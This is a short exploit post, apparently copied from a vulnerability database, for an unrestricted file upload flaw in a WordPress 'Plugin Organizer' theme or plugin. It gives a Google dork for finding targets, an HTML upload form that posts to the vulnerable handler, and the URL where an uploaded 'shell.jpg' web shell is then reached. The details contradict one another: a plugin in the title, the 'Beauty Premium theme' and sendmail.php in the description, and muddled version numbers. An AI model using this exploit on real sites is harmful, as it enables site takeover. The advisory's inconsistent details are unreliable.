Wordpress Plugin Organizer File 6.x Upload Vulnerability
https://cxsecurity.com/issue/WLB-2017050057
HTML:
<!--
* Exploit Title: Wordpress Plugin Organizer File Upload Vulnerability 6.x
* Discovery Date: 2017-05-09
* Public Disclosure Date:2017-05-09
* Vendor Homepage: http://www.tools-hack.com
* Exploit Author: sohaip-hackerDZ
* forum http://www.spyhackerz.com/forum/
* Contact: https://www.facebook.com/sohaipbarika
* Version: 8.1 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.7.x
Description
================================================================================
The Beauty Premium theme contains a contact form that is vulnerable to CSRF
and File Upload vulnerability in the sendmail.php file. The file attachment
gets uploaded to the wordpress upload directory and it is not sanitized,
allowing attackers to upload harmful code.
PoC
================================================================================
Google Dork inurl:/themes/organizer or detect via WPScan:
-->
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/" method="post">
select fuile: <input name="files[]" type="file" /><br />
<input type="submit" value="submit!" />
</form>
</body>
</html>
<!--
File will be visible:
http://127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/files/shell.jpg
You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.
Update to version 8.1
8.1
https://downloads.wordpress.org/plugin/plugin-organizer.8.1.zip
-->https://cxsecurity.com/issue/WLB-2017050057
Last edited:
